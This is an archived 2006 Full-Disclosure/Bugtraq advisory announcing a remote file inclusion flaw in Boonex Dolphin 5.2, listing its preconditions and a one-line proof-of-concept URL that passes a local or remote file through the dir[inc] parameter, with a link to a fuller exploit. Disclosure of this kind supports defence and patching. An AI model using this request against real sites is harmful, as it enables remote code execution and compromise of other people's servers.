lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <b47a94630610171949y7875639fw4565272247a653e8@mail.gmail.com> Date: Tue, 17 Oct 2006 21:49:06 -0500 From: disfigure <disfigure@...il.com> To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com Subject: Boonex Dolphin 5.2 Remote File Inclusion /****************************************/ http://www.w4cking.com CREDIT: w4ck1ng.com PRODUCT: Boonex Dolphin 5.2 http://www.boonex.com/products/dolphin/ VULNERABILITY: Remote File Inclusion NOTES: - requires register globals on - requires magic quotes off POC: <host>/<path>/templates/tmpl_dfl/scripts/index.php?dir[inc]=<local/remotefile> ADVISORY & EXPLOIT (requires registration): http://w4ck1ng.com/board/showthread.php?t=1490 /****************************************/